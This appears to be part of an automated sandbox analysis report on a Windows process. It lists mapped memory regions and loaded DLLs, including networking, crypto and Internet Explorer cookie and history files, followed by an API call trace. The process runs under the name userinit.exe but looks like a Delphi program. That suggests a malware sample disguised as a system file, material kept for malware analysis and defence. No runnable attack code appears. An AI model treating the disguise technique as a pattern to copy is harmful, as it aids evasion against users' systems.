filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2469
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2470
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2471
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 2472
start_va = 0x150000
end_va = 0x217fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000150000"
filename = ""
Region:
id = 2473
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2474
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2505
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2506
start_va = 0xc0000
end_va = 0xc0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 2507
start_va = 0x470000
end_va = 0x570fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 2508
start_va = 0x6a0000
end_va = 0x6affff
entry_point = 0x0
region_type = private
name = "private_0x00000000006a0000"
filename = ""
Region:
id = 2509
start_va = 0xf00000
end_va = 0x1afffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000f00000"
filename = ""
Region:
id = 2510
start_va = 0x580000
end_va = 0x67ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 2511
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2512
start_va = 0x6b0000
end_va = 0x8dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000006b0000"
filename = ""
Region:
id = 2524
start_va = 0x6b0000
end_va = 0x78efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006b0000"
filename = ""
Region:
id = 2525
start_va = 0x8a0000
end_va = 0x8dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 2526
start_va = 0xd0000
end_va = 0xd0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 2527
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 2528
start_va = 0x8e0000
end_va = 0xa2ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000008e0000"
filename = ""
Region:
id = 2529
start_va = 0x1b00000
end_va = 0x242ffff
entry_point = 0x1b00000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 2530
start_va = 0xe0000
end_va = 0xe6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 2531
start_va = 0xf0000
end_va = 0xf1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 2532
start_va = 0xa30000
end_va = 0xe22fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a30000"
filename = ""
Region:
id = 2533
start_va = 0x790000
end_va = 0x80ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000790000"
filename = ""
Region:
id = 2534
start_va = 0x8e0000
end_va = 0x9ecfff
entry_point = 0x0
region_type = private
name = "private_0x00000000008e0000"
filename = ""
Region:
id = 2535
start_va = 0x9f0000
end_va = 0xa2ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000009f0000"
filename = ""
Region:
id = 2537
start_va = 0x2430000
end_va = 0x252ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002430000"
filename = ""
Region:
id = 2540
start_va = 0x2530000
end_va = 0x272ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002530000"
filename = ""
Region:
id = 2544
start_va = 0x810000
end_va = 0x890fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000810000"
filename = ""
Region:
id = 2545
start_va = 0xe30000
end_va = 0xeb2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2546
start_va = 0x810000
end_va = 0x894fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000810000"
filename = ""
Region:
id = 2550
start_va = 0xe30000
end_va = 0xeb6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2551
start_va = 0x810000
end_va = 0x898fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000810000"
filename = ""
Region:
id = 2552
start_va = 0xe30000
end_va = 0xebafff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2556
start_va = 0x810000
end_va = 0x89cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000810000"
filename = ""
Region:
id = 2557
start_va = 0xe30000
end_va = 0xebefff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2558
start_va = 0x2730000
end_va = 0x27c0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2562
start_va = 0xe30000
end_va = 0xec2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2563
start_va = 0x2730000
end_va = 0x27c4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2564
start_va = 0xe30000
end_va = 0xec6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2567
start_va = 0x2730000
end_va = 0x27c8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2568
start_va = 0xe30000
end_va = 0xecafff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2569
start_va = 0x2730000
end_va = 0x27ccfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2572
start_va = 0xe30000
end_va = 0xecefff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2573
start_va = 0x2730000
end_va = 0x27d0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2574
start_va = 0xe30000
end_va = 0xed2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2578
start_va = 0x2730000
end_va = 0x27d4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2579
start_va = 0xe30000
end_va = 0xed6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2582
start_va = 0x2730000
end_va = 0x27d8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2583
start_va = 0xe30000
end_va = 0xedafff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2587
start_va = 0x2730000
end_va = 0x27dcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2588
start_va = 0xe30000
end_va = 0xedefff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2589
start_va = 0x2730000
end_va = 0x27e0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2592
start_va = 0xe30000
end_va = 0xee2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2593
start_va = 0x2730000
end_va = 0x27e4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2596
start_va = 0xe30000
end_va = 0xee6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2597
start_va = 0x2730000
end_va = 0x27e8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2601
start_va = 0xe30000
end_va = 0xeeafff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2602
start_va = 0x2730000
end_va = 0x27ecfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2603
start_va = 0xe30000
end_va = 0xeeefff
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 2606
start_va = 0x2730000
end_va = 0x27f0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2607
start_va = 0x2800000
end_va = 0x28c2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 2611
start_va = 0x2730000
end_va = 0x27f4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2612
start_va = 0x2800000
end_va = 0x28c6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 2615
start_va = 0x2730000
end_va = 0x27f8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2616
start_va = 0x2800000
end_va = 0x28cafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 2619
start_va = 0x2730000
end_va = 0x27fcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2620
start_va = 0x2800000
end_va = 0x28cefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 2623
start_va = 0x28d0000
end_va = 0x29a0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028d0000"
filename = ""
Region:
id = 2624
start_va = 0x2730000
end_va = 0x2802fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2627
start_va = 0x2810000
end_va = 0x28e4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 2628
start_va = 0x2730000
end_va = 0x2806fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2631
start_va = 0x2810000
end_va = 0x28e8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 2632
start_va = 0x2730000
end_va = 0x280afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2635
start_va = 0x2810000
end_va = 0x28ecfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 2636
start_va = 0x2730000
end_va = 0x280efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2639
start_va = 0x2810000
end_va = 0x28f0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002810000"
filename = ""
Region:
id = 2640
start_va = 0x2900000
end_va = 0x29e2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002900000"
filename = ""
Region:
id = 2643
start_va = 0x2730000
end_va = 0x2814fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2644
start_va = 0x2820000
end_va = 0x2906fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 2647
start_va = 0x2730000
end_va = 0x2818fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2648
start_va = 0x2820000
end_va = 0x290afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 2651
start_va = 0x2730000
end_va = 0x281cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2652
start_va = 0x2820000
end_va = 0x290efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002820000"
filename = ""
Region:
id = 2655
start_va = 0x2910000
end_va = 0x2a00fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002910000"
filename = ""
Region:
id = 2656
start_va = 0x2730000
end_va = 0x2822fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2659
start_va = 0x2830000
end_va = 0x2924fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 2661
start_va = 0x2730000
end_va = 0x2826fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2662
start_va = 0x2830000
end_va = 0x2928fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 2665
start_va = 0x2730000
end_va = 0x282afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2666
start_va = 0x2830000
end_va = 0x292cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 2669
start_va = 0x2730000
end_va = 0x282efff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2670
start_va = 0x2830000
end_va = 0x2930fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002830000"
filename = ""
Region:
id = 2673
start_va = 0x2940000
end_va = 0x2a42fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002940000"
filename = ""
Region:
id = 2675
start_va = 0x2730000
end_va = 0x2834fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2676
start_va = 0x2840000
end_va = 0x2946fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 2679
start_va = 0x2730000
end_va = 0x2838fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2680
start_va = 0x2840000
end_va = 0x294afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 2682
start_va = 0x2730000
end_va = 0x283cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002730000"
filename = ""
Region:
id = 2694
start_va = 0x2840000
end_va = 0x294ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002840000"
filename = ""
Region:
id = 2695
start_va = 0x2950000
end_va = 0x2a62fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002950000"
filename = ""
Region:
id = 2696
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 2697
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 2698
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 2699
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 2700
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2701
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 2702
start_va = 0x71bf0000
end_va = 0x71c2bfff
entry_point = 0x71bf0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 2703
start_va = 0x100000
end_va = 0x100fff
entry_point = 0x100000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 2704
start_va = 0x2a70000
end_va = 0x2b6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a70000"
filename = ""
Region:
id = 2705
start_va = 0x220000
end_va = 0x220fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000220000"
filename = ""
Region:
id = 2706
start_va = 0x6ceb0000
end_va = 0x6cec8fff
entry_point = 0x6ceb0000
region_type = mapped_file
name = "olepro32.dll"
filename = "\\Windows\\System32\\olepro32.dll" (normalized: "c:\\windows\\system32\\olepro32.dll")
Region:
id = 2708
start_va = 0x73b10000
end_va = 0x73b20fff
entry_point = 0x73b10000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 2709
start_va = 0x73b00000
end_va = 0x73b08fff
entry_point = 0x73b00000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 2710
start_va = 0x74f10000
end_va = 0x74f28fff
entry_point = 0x74f10000
region_type = mapped_file
name = "srvcli.dll"
filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll")
Region:
id = 2711
start_va = 0x73af0000
end_va = 0x73afefff
entry_point = 0x73af0000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 2716
start_va = 0x850000
end_va = 0x88ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000850000"
filename = ""
Region:
id = 2717
start_va = 0x2cd0000
end_va = 0x2dcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002cd0000"
filename = ""
Region:
id = 2718
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 2719
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 2725
start_va = 0x2dd0000
end_va = 0x309efff
entry_point = 0x2dd0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2726
start_va = 0x230000
end_va = 0x231fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000230000"
filename = ""
Region:
id = 2727
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 2728
start_va = 0x240000
end_va = 0x240fff
entry_point = 0x240000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 2729
start_va = 0x250000
end_va = 0x251fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000250000"
filename = ""
Region:
id = 2730
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 2731
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 2732
start_va = 0x240000
end_va = 0x240fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000240000"
filename = ""
Region:
id = 2733
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 2734
start_va = 0x390000
end_va = 0x3bbfff
entry_point = 0x390000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 2735
start_va = 0x260000
end_va = 0x267fff
entry_point = 0x260000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 2736
start_va = 0x270000
end_va = 0x27ffff
entry_point = 0x270000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 2755
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 2756
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 2757
start_va = 0x30a0000
end_va = 0x328ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000030a0000"
filename = ""
Region:
id = 2758
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 2759
start_va = 0x30a0000
end_va = 0x321ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000030a0000"
filename = ""
Region:
id = 2760
start_va = 0x3250000
end_va = 0x328ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003250000"
filename = ""
Region:
id = 2761
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 2762
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 2766
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 2767
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 2768
start_va = 0xe30000
end_va = 0xeeffff
entry_point = 0xe30000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Thread:
id = 224
os_tid = 0xf54
[0086.623] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0086.623] GetKeyboardType (nTypeFlag=0) returned 4
[0086.623] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0086.623] GetStartupInfoA (in: lpStartupInfo=0x14fda4 | out: lpStartupInfo=0x14fda4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0086.624] GetVersion () returned 0x1db10106
[0086.624] GetVersion () returned 0x1db10106
[0086.624] GetCurrentThreadId () returned 0xf54
[0086.624] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x14f8a0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0086.624] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14f77b, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0086.624] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x14f890 | out: phkResult=0x14f890*=0x0) returned 0x2
[0086.624] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x14f890 | out: phkResult=0x14f890*=0x0) returned 0x2
[0086.624] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x14f890 | out: phkResult=0x14f890*=0x0) returned 0x2
[0086.624] lstrcpynA (in: lpString1=0x14f77b, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0086.624] GetThreadLocale () returned 0x409
[0086.624] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x14f88b, cchData=5 | out: lpLCData="ENU") returned 4
[0086.625] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0086.625] lstrcpynA (in: lpString1=0x14f798, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0086.625] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0086.625] lstrcpynA (in: lpString1=0x14f798, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0086.625] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0086.625] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0086.625] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x2a3640
[0086.626] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x580000
[0086.626] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x2a4640
[0086.626] VirtualAlloc (lpAddress=0x580000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x580000
[0086.626] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0086.626] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0086.626] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0086.626] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0086.626] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0086.626] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0086.626] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0086.626] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0086.626] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x14f9c4, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
